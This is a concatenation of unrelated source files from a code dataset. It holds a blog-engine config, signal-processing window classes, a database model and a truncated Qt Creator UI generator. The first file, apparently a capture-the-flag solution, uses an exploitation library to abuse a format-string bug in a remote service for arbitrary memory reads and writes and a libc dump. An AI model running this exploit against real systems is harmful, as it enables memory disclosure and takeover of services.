#logging.getLogger("puppeteer.connection").setLevel(logging.DEBUG)
#logging.getLogger("puppeteer.manipulator").setLevel(logging.DEBUG)
#logging.getLogger("puppeteer.vuln_decorators").setLevel(logging.DEBUG)
#logging.getLogger("puppeteer.formatter").setLevel(logging.DEBUG)
class Aggravator(p.Manipulator):
def __init__(self, host, port):
p.Manipulator.__init__(self, p.x86)
# some initial info from IDA
# TODO: maybe use IDALink to get this automatically?
self.permanent_info['main_start'] = 0x0804A9B3
self.permanent_info['main_end'] = 0x0804A9D1
self.permanent_info['main_stackframe_size'] = 0x24
self.c = self.set_connection(p.Connection(host=host, port=port).connect())
self.c.read_until("> ")
@p.printf(byte_offset=244, max_length=31, forbidden={'\x00', '\x0a'})
def stats_printf(self, fmt):
self.c.send("stats " + fmt + "\n")
self.c.read_until("kill top:\n")
try:
result = self.c.read_until("\n"*5, timeout=3)[:-5]
self.c.read_until("> ", timeout=3)
except EOFError:
print "Program didn't finish the print"
return ""
#print "GOT:",repr(result)
return result
def main():
# Create the Aggravator!
a = Aggravator(sys.argv[1], int(sys.argv[2]))
# And now, we can to stuff!
# We can read the stack!
#print "STACKZ",a.dump_stack(1000).encode('hex')
print "Testing memory read."
assert a.do_memory_read(0x0804A9C3, 16) == '\x00\x8B\x44\x24\x1C\x89\x04\x24\xE8\x20\xFE\xFF\xFF\xC9\xC3\x66'
## We can figure out where __libc_start_main is!
lcsm = a.main_return_address(start_offset=390)
print "main() will return to (presumably, this is in libc):",hex(lcsm)
# interactive memory explorer!
a.memory_explorer(lcsm)
# now dump it!
libc = a.dump_elf(lcsm) #- 0x1000 # the minus is because on my test machine, the address has a \x00 in it
print "dumped %d pages from libc" % len(libc)
#a.dump_libc("aggregator_libc", start_offset=390)
# We can overwrite memory with ease!
a.do_memory_write(0x0804C344, "OK")
assert a.do_memory_read(0x0804C344, 2) == "OK"
a.c.send("quit\n")
#libc_page_start = lcsm & 0xfffff000
#libc_page_content = a.do_memory_read(libc_page_start, 0x1000)
#open("dumped", "w").write(libc_page_content)
#print "read out %d bytes from libc!" % len(libc_page_content)
if __name__ == '__main__':
import sys
main()
|
gpl-3.0
| -910,140,454,615,389,800
| 33.671053
| 113
| 0.639848
| false
| 2.987528
| false
| false
| false
|
jpaasen/cos
|
framework/Window.py
|
1
|
5925
|
#from TypeExtensions import Ndarray
from gfuncs import processArgs
from mynumpy import pi, dot, cos, sin, exp #ones, complex, sin, linspace, exp, pi, dot, angle
import mynumpy as np
#from pylab import plot, subplot, xlabel, ylabel, grid, show, figure, ion, ioff
class Window(np.Ndarray):
def __new__(self, type='rect', **kwargs):
from gfuncs import error
if type == 'rect':
return self.rect(self,kwargs)
elif type == 'kaiser':
return self.kaiser(kwargs)
else:
error(self, 'The window type %s is not recognised'%type)
#
# Configurable.__init__(self)
# Operable.__init__(self)
class Rect(np.Ndarray):
def __new__(self, M=10, phi=0, normalised=True):
# Create the window
if phi == 0:
win = np.ones( (M,), dtype=None ) / M
else:
wc = np.ones( M, dtype=complex ) # Window coefficients
m = np.arange(0,M) # Create M indeces from 0 to 1
a = exp(-1j*2*pi*m*phi) # Steering vector
ws = dot(wc, a) # Normalisation factor
win = a * wc / ws # Steered and normalised window
w = np.Ndarray.__new__(self, win)
# axes=('M',),
# desc = 'Rectangular (phi=%d)'%phi)
# desc='Rectangular (phi=%d)'%phi,
# shape_desc=('M','1'))
return w
class Trig(np.Ndarray):
def __new__(self, M=10, a=0.54, phi=0, normalised=True):
# Create the window
if phi == 0:
wc = a + (1-a)*np.cos(2*pi*np.linspace(-0.5,0.5,M))
win = wc / sum(wc) # Normalised window
else:
n = np.linspace(-0.5,0.5,M)
wc = a + (1-a)*np.cos(2*pi*n) # Window coefficients
m = np.arange(0,M) # Create M indeces from 0 to 1
aa = exp(-1j*2*pi*m*phi) # Steering vector
ws = dot(wc, aa) # Normalisation factor
win = aa * wc / ws # Steered and normalised window
w = np.Ndarray.__new__(self, win)
# axes=('M',),
# desc = 'Rectangular (phi=%d)'%phi)
# desc='Rectangular (phi=%d)'%phi,
# shape_desc=('M','1'))
return w
class Kaiser(np.Ndarray):
'''kaiser( M=10, beta=1, phi=0, normalised=True )
The Kaiser window is a taper formed by using a Bessel function.
Parameters
----------
M (int) : Number of points in the output window.
beta (float) : Shape parameter for window.
phi (float) : Steering angle.
normalised (boolean) : Use normalised window coefficients?
'''
def __new__(self, M=10, beta=1, phi=0, normalised=True, inverted=False):
if not inverted:
if phi == 0:
wc = np.kaiser(M, beta) # Window coefficients
win = wc / sum(wc) # Normalised window
else:
wc = np.kaiser(M, beta) # Window coefficients
m = np.arange(0,M) # Create M indeces from 0 to 1
a = exp(-1j*2*pi*m*phi) # Steering vector
ws = dot(wc, a) # Normalisation factor
win = a * wc / ws # Steered and normalised window
else:
if phi == 0:
wc = 1 / np.kaiser(M, beta) # Window coefficients
win = wc / sum(wc) # Normalised window
else:
wc = 1 / np.kaiser(M, beta) # Window coefficients
m = np.arange(0,M) # Create M indeces from 0 to 1
a = exp(-1j*2*pi*m*phi) # Steering vector
ws = dot(wc,a) # Normalisation factor
win = a * wc / ws # Steered and normalised window
w = np.Ndarray.__new__(self, win)
# axes=('M',),
# desc = 'Kaiser (beta=%d, phi=%d)'%(beta,phi))
# shape_desc=('M','1'))
return w
# def plot(self, **kwargs):
#
# # Set some default options
# opts = {'magnitude':True, 'angle':False, 'grid':True, 'degrees':True}
#
# # Add the user-specified options
# for key,val in kwargs.iteritems():
# if opts.has_key(key):
# opts[key] = val
# else:
# opts[key] = val
# print 'WW: Window.plot() - Supplied parameter '+key+' is unknown.'
#
# ion()
# if opts['magnitude'] and opts['angle']:
# figure()
# subplot(2,1,1)
# plot( abs(self.w) )
# xlabel( 'Channel #' )
# ylabel( 'Magnitude' )
# grid( opts['grid'] )
#
# subplot(2,1,2)
# plot( angle(self.w, deg=opts['degrees']) )
# xlabel( 'Channel #' )
# if opts['degrees']:
# ylabel( 'Angle [degrees]' )
# else:
# ylabel( 'Angle [radians]' )
# grid( opts['grid'] )
## show()
#
# elif opts['magnitude']:
# figure()
# plot( abs(self.w) )
# xlabel( 'Channel #' )
# ylabel( 'Magnitude' )
# grid( opts['grid'] )
## show()
#
# else:
# figure()
# plot( angle(self.w, deg=opts['degrees']) )
# xlabel( 'Channel #' )
# if opts['degrees']:
# ylabel( 'Angle [degrees]' )
# else:
# ylabel( 'Angle [radians]' )
# grid( opts['grid'] )
## show()
# ioff()
|
mit
| 5,193,458,981,794,878,000
| 36.5
| 93
| 0.4427
| false
| 3.58006
| false
| false
| false
|
masterdje/wibfi
|
conf.py
|
1
|
22684
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import time
# Configuration, please edit
# Data about this site
BLOG_AUTHOR = "Dje"
BLOG_TITLE = "Write it before forget it!"
# This is the main URL for your site. It will be used
# in a prominent link
SITE_URL = "http://wibfi.virtua-peanuts.net/"
# This is the URL where nikola's output will be deployed.
# If not set, defaults to SITE_URL
# BASE_URL = "http://getnikola.com/"
BLOG_EMAIL = "wibfi@virtua-peanuts.net"
BLOG_DESCRIPTION = "Write it before forget it !"
# Nikola is multilingual!
#
# Currently supported languages are:
# en English
# bg Bulgarian
# ca Catalan
# zh_cn Chinese (Simplified)
# hr Croatian
# nl Dutch
# fr French
# el Greek [NOT gr!]
# de German
# it Italian
# jp Japanese
# fa Persian
# pl Polish
# pt_br Portuguese (Brasil)
# ru Russian
# es Spanish
# tr_tr Turkish (Turkey)
#
# If you want to use Nikola with a non-supported language you have to provide
# a module containing the necessary translations
# (p.e. look at the modules at: ./nikola/data/themes/default/messages/fr.py).
# If a specific post is not translated to a language, then the version
# in the default language will be shown instead.
#from nikola import filters
#FILTERS = {
# ".css": [filters.yui_compressor],
#".js": [filters.yui_compressor],
#}
# What is the default language?
DEFAULT_LANG = "fr"
LOCALES = {'fr': 'fr_FR.utf8', 'en': 'en_US.utf8'}
# What other languages do you have?
# The format is {"translationcode" : "path/to/translation" }
# the path will be used as a prefix for the generated pages location
TRANSLATIONS = {
DEFAULT_LANG: "",
# Example for another language:
"en": "./en",
}
TRANSLATIONS_PATTERN = "{path}.{ext}.{lang}"
# Links for the sidebar / navigation bar.
# You should provide a key-value pair for each used language.
NAVIGATION_LINKS = {
DEFAULT_LANG: (
('/stories/cheatsheets.html', "Cheat-Sheets"),
('/stories/what-s-next.html', "What's next"),
('/archive.html', 'Archives'),
('/categories/index.html', 'Tags'),
('/rss.xml', 'RSS'),
),
"en": (
('/en/stories/cheatsheets.html', "Cheat-Sheets"),
('/en/stories/what-s-next.html', "What's next"),
('/en/archive.html', 'Archives'),
('/en/categories/index.html', 'Tags'),
('/en/rss.xml', 'RSS'),
),
}
# Below this point, everything is optional
# POSTS and PAGES contains (wildcard, destination, template) tuples.
#
# The wildcard is used to generate a list of reSt source files
# (whatever/thing.txt).
#
# That fragment could have an associated metadata file (whatever/thing.meta),
# and opcionally translated files (example for spanish, with code "es"):
# whatever/thing.txt.es and whatever/thing.meta.es
#
# From those files, a set of HTML fragment files will be generated:
# cache/whatever/thing.html (and maybe cache/whatever/thing.html.es)
#
# These files are combinated with the template to produce rendered
# pages, which will be placed at
# output / TRANSLATIONS[lang] / destination / pagename.html
#
# where "pagename" is the "slug" specified in the metadata file.
#
# The difference between POSTS and PAGES is that POSTS are added
# to feeds and are considered part of a blog, while PAGES are
# just independent HTML pages.
#
POSTS = (
("posts/*.txt", "posts", "post.tmpl"),
("posts/*.rst", "posts", "post.tmpl"),
)
PAGES = (
("stories/*.txt", "stories", "story.tmpl"),
("stories/*.rst", "stories", "story.tmpl"),
)
# One or more folders containing files to be copied as-is into the output.
# The format is a dictionary of "source" "relative destination".
# Default is:
FILES_FOLDERS = { 'test': '', 'test': 'posts/','test': 'stories/'}
# Which means copy 'files' into 'output'
# A mapping of languages to file-extensions that represent that language.
# Feel free to add or delete extensions to any list, but don't add any new
# compilers unless you write the interface for it yourself.
#
# 'rest' is reStructuredText
# 'markdown' is MarkDown
# 'html' assumes the file is html and just copies it
COMPILERS = {
"rest": ('.rst', '.txt'),
"markdown": ('.md', '.mdown', '.markdown'),
"textile": ('.textile',),
"txt2tags": ('.t2t',),
"bbcode": ('.bb',),
"wiki": ('.wiki',),
"ipynb": ('.ipynb',),
"html": ('.html', '.htm'),
}
# Create by default posts in one file format?
# Set to False for two-file posts, with separate metadata.
ONE_FILE_POSTS = True
# If this is set to True, then posts that are not translated to a language
# LANG will not be visible at all in the pages in that language.
# If set to False, the DEFAULT_LANG version will be displayed for
# untranslated posts.
# HIDE_UNTRANSLATED_POSTS = False
# Paths for different autogenerated bits. These are combined with the
# translation paths.
# Final locations are:
# output / TRANSLATION[lang] / TAG_PATH / index.html (list of tags)
# output / TRANSLATION[lang] / TAG_PATH / tag.html (list of posts for a tag)
# output / TRANSLATION[lang] / TAG_PATH / tag.xml (RSS feed for a tag)
TAG_PATH = "categories"
# If TAG_PAGES_ARE_INDEXES is set to True, each tag's page will contain
# the posts themselves. If set to False, it will be just a list of links.
# TAG_PAGES_ARE_INDEXES = True
# Final location is output / TRANSLATION[lang] / INDEX_PATH / index-*.html
# INDEX_PATH = ""
# Create per-month archives instead of per-year
CREATE_MONTHLY_ARCHIVE = True
# Final locations for the archives are:
# output / TRANSLATION[lang] / ARCHIVE_PATH / ARCHIVE_FILENAME
# output / TRANSLATION[lang] / ARCHIVE_PATH / YEAR / index.html
# output / TRANSLATION[lang] / ARCHIVE_PATH / YEAR / MONTH / index.html
# ARCHIVE_PATH = ""
# ARCHIVE_FILENAME = "archive.html"
# Final locations are:
# output / TRANSLATION[lang] / RSS_PATH / rss.xml
# RSS_PATH = ""
# Number of posts in RSS feeds
FEED_LENGTH = 10
# Slug the Tag URL easier for users to type, special characters are
# often removed or replaced as well.
# SLUG_TAG_PATH = True
# A list of redirection tuples, [("foo/from.html", "/bar/to.html")].
#
# A HTML file will be created in output/foo/from.html that redirects
# to the "/bar/to.html" URL. notice that the "from" side MUST be a
# relative URL.
#
# If you don't need any of these, just set to []
# REDIRECTIONS = []
# Commands to execute to deploy. Can be anything, for example,
# you may use rsync:
# And then do a backup, or ping pingomatic.
# To do manual deployment, set it to []
DEPLOY_COMMANDS = ['lftp -e "mirror --delete-first -R output/ .;exit" u45372881@virtua-peanuts.net/wibfi',
'echo Save ...',
'cd .. ; tar cvjf _save-wibfi_.tgz wibfi/ ; lftp -e "put _save-wibfi_.tgz;exit" u45372881@virtua-peanuts.net/wibfi/backup; cd wibfi']
# Where the output site should be located
# If you don't use an absolute path, it will be considered as relative
# to the location of conf.py
# OUTPUT_FOLDER = 'output'
# where the "cache" of partial generated content should be located
# default: 'cache'
# CACHE_FOLDER = 'cache'
# Filters to apply to the output.
# A directory where the keys are either: a file extensions, or
# a tuple of file extensions.
#
# And the value is a list of commands to be applied in order.
#
# Each command must be either:
#
# A string containing a '%s' which will
# be replaced with a filename. The command *must* produce output
# in place.
#
# Or:
#
# A python callable, which will be called with the filename as
# argument.
#
# By default, there are no filters.
# FILTERS = {
# ".jpg": ["jpegoptim --strip-all -m75 -v %s"],
# }
# Create a gzipped copy of each generated file. Cheap server-side optimization.
GZIP_FILES = True
# File extensions that will be compressed
GZIP_EXTENSIONS = ('.txt','.rst', '.htm', '.html', '.css', '.js', '.json')
# #############################################################################
# Image Gallery Options
# #############################################################################
# Galleries are folders in galleries/
# Final location of galleries will be output / GALLERY_PATH / gallery_name
# GALLERY_PATH = "galleries"
# THUMBNAIL_SIZE = 180
# MAX_IMAGE_SIZE = 1280
# USE_FILENAME_AS_TITLE = True
# #############################################################################
# HTML fragments and diverse things that are used by the templates
# #############################################################################
# Data about post-per-page indexes
# INDEXES_TITLE = "" # If this is empty, the default is BLOG_TITLE
# INDEXES_PAGES = "" # If this is empty, the default is 'old posts page %d'
# translated
# Name of the theme to use.
THEME = "w2"
# Color scheme to be used for code blocks. If your theme provides
# "assets/css/code.css" this is ignored.
# Can be any of autumn borland bw colorful default emacs friendly fruity manni
# monokai murphy native pastie perldoc rrt tango trac vim vs
CODE_COLOR_SCHEME = 'borland'
# If you use 'site-reveal' theme you can select several subthemes
# THEME_REVEAL_CONFIG_SUBTHEME = 'sky'
# You can also use: beige/serif/simple/night/default
# Again, if you use 'site-reveal' theme you can select several transitions
# between the slides
# THEME_REVEAL_CONFIG_TRANSITION = 'cube'
# You can also use: page/concave/linear/none/default
# date format used to display post dates.
# (str used by datetime.datetime.strftime)
# DATE_FORMAT = '%Y-%m-%d %H:%M'
# FAVICONS contains (name, file, size) tuples.
# Used for create favicon link like this:
# <link rel="name" href="file" sizes="size"/>
# For creating favicons, take a look at:
# http://www.netmagazine.com/features/create-perfect-favicon
FAVICONS = {
("icon", "/favicon.ico", "16x16"),
("icon", "/favicon.png", "64x64"),
}
# Show only teasers in the index pages? Defaults to False.
INDEX_TEASERS = True
# A HTML fragment with the Read more... link.
# The following tags exist and are replaced for you:
# {link} A link to the full post page.
# {read_more} The string “Read more” in the current language.
# {{ A literal { (U+007B LEFT CURLY BRACKET)
# }} A literal } (U+007D RIGHT CURLY BRACKET)
READ_MORE_LINK = '<p class="more"><a href="{link}">{read_more}…</a></p>'
# A HTML fragment describing the license, for the sidebar.
LICENSE = '<a rel="license" href="http://creativecommons.org/licenses/by-sa/3.0/fr/"><img title="TL;DR" alt="Licence Creative Commons" style="border-width:0" src="http://i.creativecommons.org/l/by-sa/3.0/fr/88x31.png" /></a>'
# I recommend using the Creative Commons' wizard:
# http://creativecommons.org/choose/
# LICENSE = """
# <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/2.5/ar/">
# <img alt="Creative Commons License BY-NC-SA"
# style="border-width:0; margin-bottom:12px;"
# src="http://i.creativecommons.org/l/by-nc-sa/2.5/ar/88x31.png"></a>"""
# A small copyright notice for the page footer (in HTML).
# Default is ''
XITI = """<a href="http://www.xiti.com/xiti.asp?s=538203" title="WebAnalytics" target="_top">
<script type="text/javascript">
<!--
Xt_param = 's=538203&p=index';
try {Xt_r = top.document.referrer;}
catch(e) {Xt_r = document.referrer; }
Xt_h = new Date();
Xt_i = '<img width="80" height="15" border="0" alt="" ';
Xt_i += 'src="http://logv4.xiti.com/g.xiti?'+Xt_param;
Xt_i += '&hl='+Xt_h.getHours()+'x'+Xt_h.getMinutes()+'x'+Xt_h.getSeconds();
if(parseFloat(navigator.appVersion)>=4)
{Xt_s=screen;Xt_i+='&r='+Xt_s.width+'x'+Xt_s.height+'x'+Xt_s.pixelDepth+'x'+Xt_s.colorDepth;}
document.write(Xt_i+'&ref='+Xt_r.replace(/[<>"]/g, '').replace(/&/g, '$')+'" title="Internet Audience">');
//-->
</script>
<noscript>
<img width="80" height="15" src="http://logv4.xiti.com/g.xiti?s=538203&p=index" alt="WebAnalytics" />
</noscript></a>"""
CONTENT_FOOTER = '2013 - {date} <a href="mailto:{email}">{author}</a> mais c\'est <a href="http://getnikola.com">Nikola</a> qui propulse. {license} - {xiti}'
CONTENT_FOOTER = CONTENT_FOOTER.format(email=BLOG_EMAIL,
author=BLOG_AUTHOR,
date=time.gmtime().tm_year,
license=LICENSE, xiti=XITI)
# To use comments, you can choose between different third party comment
# systems, one of "disqus", "livefyre", "intensedebate", "moot",
# "googleplus" or "facebook"
COMMENT_SYSTEM = "disqus"
# And you also need to add your COMMENT_SYSTEM_ID which
# depends on what comment system you use. The default is
# "nikolademo" which is a test account for Disqus. More information
# is in the manual.
COMMENT_SYSTEM_ID = "wibfi"
# Create index.html for story folders?
# STORY_INDEX = False
# Enable comments on story pages?
# COMMENTS_IN_STORIES = False
# Enable comments on picture gallery pages?
# COMMENTS_IN_GALLERIES = False
# What file should be used for directory indexes?
# Defaults to index.html
# Common other alternatives: default.html for IIS, index.php
# INDEX_FILE = "index.html"
# If a link ends in /index.html, drop the index.html part.
# http://mysite/foo/bar/index.html => http://mysite/foo/bar/
# (Uses the INDEX_FILE setting, so if that is, say, default.html,
# it will instead /foo/default.html => /foo)
# (Note: This was briefly STRIP_INDEX_HTML in v 5.4.3 and 5.4.4)
# Default = False
# STRIP_INDEXES = False
# Should the sitemap list directories which only include other directories
# and no files.
# Default to True
# If this is False
# e.g. /2012 includes only /01, /02, /03, /04, ...: don't add it to the sitemap
# if /2012 includes any files (including index.html)... add it to the sitemap
# SITEMAP_INCLUDE_FILELESS_DIRS = True
# Instead of putting files in <slug>.html, put them in
# <slug>/index.html. Also enables STRIP_INDEXES
# This can be disabled on a per-page/post basis by adding
# .. pretty_url: False
# to the metadata
# PRETTY_URLS = False
# If True, publish future dated posts right away instead of scheduling them.
# Defaults to False.
# FUTURE_IS_NOW = False
# If True, future dated posts are allowed in deployed output
# Only the individual posts are published/deployed; not in indexes/sitemap
# Generally, you want FUTURE_IS_NOW and DEPLOY_FUTURE to be the same value.
# DEPLOY_FUTURE = False
# If False, draft posts will not be deployed
# DEPLOY_DRAFTS = True
# Allows scheduling of posts using the rule specified here (new_post -s)
# Specify an iCal Recurrence Rule: http://www.kanzaki.com/docs/ical/rrule.html
#SCHEDULE_RULE = 'RRULE:FREQ=DAILY;BYHOUR=12;BYMINUTE=0;BYSECOND=0'
# If True, use the scheduling rule to all posts by default
SCHEDULE_ALL = False
# If True, schedules post to today if possible, even if scheduled hour is over
# SCHEDULE_FORCE_TODAY = False
# Do you want a add a Mathjax config file?
# MATHJAX_CONFIG = ""
# If you are using the compile-ipynb plugin, just add this one:
#MATHJAX_CONFIG = """
#<script type="text/x-mathjax-config">
#MathJax.Hub.Config({
# tex2jax: {
# inlineMath: [ ['$','$'], ["\\\(","\\\)"] ],
# displayMath: [ ['$$','$$'], ["\\\[","\\\]"] ]
# },
# displayAlign: 'left', // Change this to 'center' to center equations.
# "HTML-CSS": {
# styles: {'.MathJax_Display': {"margin": 0}}
# }
#});
#</script>
#"""
# What MarkDown extensions to enable?
# You will also get gist, nikola and podcast because those are
# done in the code, hope you don't mind ;-)
# MARKDOWN_EXTENSIONS = ['fenced_code', 'codehilite']
# Social buttons. This is sample code for AddThis (which was the default for a
# long time). Insert anything you want here, or even make it empty.
SOCIAL_BUTTONS_CODE = ""
# <!-- Social buttons -->
# <div id="addthisbox" class="addthis_toolbox addthis_peekaboo_style addthis_default_style addthis_label_style addthis_32x32_style">
# <a class="addthis_button_more">Share</a>
# <ul><li><a class="addthis_button_facebook"></a>
# <li><a class="addthis_button_google_plusone_share"></a>
# <li><a class="addthis_button_linkedin"></a>
# <li><a class="addthis_button_twitter"></a>
# </ul>
# </div>
# <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-4f7088a56bb93798"></script>
# <!-- End of social buttons -->
#"""
# Hide link to source for the posts?
HIDE_SOURCELINK = True
# Copy the source files for your pages?
# Setting it to False implies HIDE_SOURCELINK = True
COPY_SOURCES = False
# Modify the number of Post per Index Page
# Defaults to 10
INDEX_DISPLAY_POST_COUNT = 10
# RSS_LINK is a HTML fragment to link the RSS or Atom feeds. If set to None,
# the base.tmpl will use the feed Nikola generates. However, you may want to
# change it for a feedburner feed or something else.
# RSS_LINK = None
# Show only teasers in the RSS feed? Default to True
RSS_TEASERS = True
# A search form to search this site, for the sidebar. You can use a google
# custom search (http://www.google.com/cse/)
# Or a duckduckgo search: https://duckduckgo.com/search_box.html
# Default is no search form.
# SEARCH_FORM = ""
#
# This search form works for any site and looks good in the "site" theme where
# it appears on the navigation bar:
#
SEARCH_FORM = """
<!-- Custom search -->
<form method="get" id="search" action="http://duckduckgo.com/"
class="navbar-form pull-left">
<input type="hidden" name="sites" value="%s"/>
<input type="hidden" name="k8" value="#444444"/>
<input type="hidden" name="k9" value="#D51920"/>
<input type="hidden" name="kt" value="h"/>
<input type="text" name="q" maxlength="255" placeholder="DuckDuckGo…" class="span2 form-control input-sm" style="width:65%%; padding:0; height:2em;"/>
<input type="submit" value="DuckDuckGo Search" style="visibility: hidden; width: 5%%" />
</form>
<!-- End of custom search -->
""" % SITE_URL
#
# If you prefer a google search form, here's an example that should just work:
#SEARCH_FORM = """
#<!-- Custom search with google-->
#<form id="search" action="http://google.com/search" method="get" class="navbar-form pull-left">
#<input type="hidden" name="q" value="site:%s" />
#<input type="text" name="q" maxlength="255" results="0" placeholder="Search"/>
#</form>
#<!-- End of custom search -->
#""" % SITE_URL
# Also, there is a local search plugin you can use, based on Tipue, but it requires setting several
# options:
# SEARCH_FORM = """
# <span class="navbar-form pull-left">
# <input type="text" id="tipue_search_input">
# </span>"""
#
# BODY_END = """
# <script type="text/javascript" src="/assets/js/tipuesearch_set.js"></script>
# <script type="text/javascript" src="/assets/js/tipuesearch.js"></script>
# <script type="text/javascript">
# $(document).ready(function() {
# $('#tipue_search_input').tipuesearch({
# 'mode': 'json',
# 'contentLocation': '/assets/js/tipuesearch_content.json',
# 'showUrl': false
# });
# });
# </script>
# """
EXTRA_HEAD_DATA = """
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-44317802-1']);
_gaq.push(['_setDomainName', 'virtua-peanuts.net']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>"""
# <link rel="stylesheet" type="text/css" href="/assets/css/tipuesearch.css">
# <div id="tipue_search_content" style="margin-left: auto; margin-right: auto; padding: 20px;"></div>
# ENABLED_EXTRAS = ['local_search']
#
# Use content distribution networks for jquery and twitter-bootstrap css and js
# If this is True, jquery is served from the Google CDN and twitter-bootstrap
# is served from the NetDNA CDN
# Set this to False if you want to host your site without requiring access to
# external resources.
# USE_CDN = False
# Extra things you want in the pages HEAD tag. This will be added right
# before </HEAD>
# EXTRA_HEAD_DATA = ""
# Google analytics or whatever else you use. Added to the bottom of <body>
# in the default template (base.tmpl).
# BODY_END = ""
# The possibility to extract metadata from the filename by using a
# regular expression.
# To make it work you need to name parts of your regular expression.
# The following names will be used to extract metadata:
# - title
# - slug
# - date
# - tags
# - link
# - description
#
# An example re is the following:
# '(?P<date>\d{4}-\d{2}-\d{2})-(?P<slug>.*)-(?P<title>.*)\.md'
# FILE_METADATA_REGEXP = None
# Additional metadata that is added to a post when creating a new_post
ADDITIONAL_METADATA = {}
# Nikola supports Twitter Card summaries / Open Graph.
# Twitter cards make it possible for you to attach media to Tweets
# that link to your content.
#
# IMPORTANT:
# Please note, that you need to opt-in for using Twitter Cards!
# To do this please visit
# https://dev.twitter.com/form/participate-twitter-cards
#
# Uncomment and modify to following lines to match your accounts.
# Specifying the id for either 'site' or 'creator' will be preferred
# over the cleartext username. Specifying an ID is not necessary.
# Displaying images is currently not supported.
# TWITTER_CARD = {
# # 'use_twitter_cards': True, # enable Twitter Cards / Open Graph
# # 'site': '@website', # twitter nick for the website
# # 'site:id': 123456, # Same as site, but the website's Twitter user ID
# # instead.
# # 'creator': '@username', # Username for the content creator / author.
# # 'creator:id': 654321, # Same as creator, but the Twitter user's ID.
# }
# If you want to use formatted post time in W3C-DTF Format
# (ex. 2012-03-30T23:00:00+02:00),
# set timzone if you want a localized posted date.
#
TIMEZONE = 'Europe/Paris'
# If webassets is installed, bundle JS and CSS to make site loading faster
# USE_BUNDLES = True
# Plugins you don't want to use. Be careful :-)
# DISABLED_PLUGINS = ["render_galleries"]
# Experimental plugins - use at your own risk.
# They probably need some manual adjustments - please see their respective
# readme.
ENABLED_EXTRAS = [
# 'planetoid',
# 'ipynb',
# 'local_search',
# 'render_mustache',
]
# List of regular expressions, links matching them will always be considered
# valid by "nikola check -l"
# LINK_CHECK_WHITELIST = []
# If set to True, enable optional hyphenation in your posts (requires pyphen)
# HYPHENATE = False
# Put in global_context things you want available on all your templates.
# It can be anything, data, functions, modules, etc.
GLOBAL_CONTEXT = {}
|
gpl-3.0
| -2,642,146,339,466,596,400
| 34.269051
| 225
| 0.670915
| false
| 3.153226
| false
| false
| false
|
xuanthuong/golfgame
|
models/work_history.py
|
1
|
2217
|
# -*- coding: utf-8 -*-
# Description: work_history table
# By Thuong.Tran
# Date: 29 Aug 2017
from sqlalchemy import create_engine, Table, Column, MetaData, Integer, Text, DateTime, Float
from sqlalchemy import select, and_
import datetime as dt
class work_history():
def __init__(self, db_url):
_engine = create_engine(db_url)
_connection = _engine.connect()
_metadata = MetaData()
_work_history = Table("work_history", _metadata,
Column("WRK_HIS_ID", Integer, primary_key=True),
Column("USR_ID", Integer),
Column("PROC_NM", Text),
Column("ST_DT", DateTime),
Column("END_DT", DateTime),
Column("LD_TM", Float),
Column("CRE_DT", DateTime))
_metadata.create_all(_engine)
self.connection = _connection
self.work_history = _work_history
pass
def insert_to(self, data):
is_valid = True
# for item in data:
# if not item:
# is_valid = False
# raise DropItem("Missing %s!" % item)
if is_valid:
ins_query = self.work_history.insert().values(data)
self.connection.execute(ins_query)
def get_all(self):
s = select([self.work_history]).order_by('PROC_NM')
result = self.connection.execute(s)
return result
def get_by_period(self, start_date, end_date):
s = select([self.work_history]).where(and_(self.work_history.c.ST_DT >= start_date,
self.work_history.c.END_DT <= end_date))
result = self.connection.execute(s)
return result
def get_finalized_process_of_one_day(self, today, worker):
lower = dt.datetime(today.year, today.month, today.day, 0, 0, 0)
upper = dt.datetime(today.year, today.month, today.day, 23, 59, 59)
print(lower)
print(upper)
s = select([self.work_history]).where(and_(self.work_history.c.END_DT > lower,
self.work_history.c.END_DT < upper,
self.work_history.c.USR_ID == worker))
result = self.connection.execute(s)
return result
|
mit
| 6,242,151,486,691,357,000
| 35.95
| 93
| 0.564727
| false
| 3.744932
| false
| false
| false
|
qtproject/qt-creator
|
scripts/generateClangFormatChecksUI.py
|
3
|
9025
|
#!/usr/bin/env python
############################################################################
#
# Copyright (C) 2019 The Qt Company Ltd.
# Contact: https://www.qt.io/licensing/
#
# This file is part of Qt Creator.
#
# Commercial License Usage
# Licensees holding valid commercial Qt licenses may use this file in
# accordance with the commercial license agreement provided with the
# Software or, alternatively, in accordance with the terms contained in
# a written agreement between you and The Qt Company. For licensing terms
# and conditions see https://www.qt.io/terms-conditions. For further
# information use the contact form at https://www.qt.io/contact-us.
#
# GNU General Public License Usage
# Alternatively, this file may be used under the terms of the GNU
# General Public License version 3 as published by the Free Software
# Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT
# included in the packaging of this file. Please review the following
# information to ensure the GNU General Public License requirements will
# be met: https://www.gnu.org/licenses/gpl-3.0.html.
#
############################################################################
import argparse
import json
import os
import docutils.nodes
import docutils.parsers.rst
import docutils.utils
def full_ui_content(checks):
return '''<?xml version="1.0" encoding="UTF-8"?>
<ui version="4.0">
<class>ClangFormat::ClangFormatChecksWidget</class>
<widget class="QWidget" name="ClangFormat::ClangFormatChecksWidget">
<property name="maximumSize">
<size>
<width>480</width>
<height>16777215</height>
</size>
</property>
<layout class="QGridLayout" name="checksLayout">
''' + checks + ''' </layout>
</widget>
<resources/>
<connections/>
</ui>
'''
def parse_arguments():
parser = argparse.ArgumentParser(description='Clazy checks header file generator')
parser.add_argument('--clang-format-options-rst', help='path to ClangFormatStyleOptions.rst',
default=None, dest='options_rst')
return parser.parse_args()
def parse_rst(text):
parser = docutils.parsers.rst.Parser()
components = (docutils.parsers.rst.Parser,)
settings = docutils.frontend.OptionParser(components=components).get_default_values()
document = docutils.utils.new_document('<rst-doc>', settings=settings)
parser.parse(text, document)
return document
def createItem(key, value, index):
label = ''' <item row="''' + str(index) + '''" column="0">
<widget class="QLabel" name="label''' + key + '''">
<property name="text">
<string notr="true">''' + key + '''</string>
</property>
</widget>
</item>
'''
value_item = ''
if value[0] == 'bool':
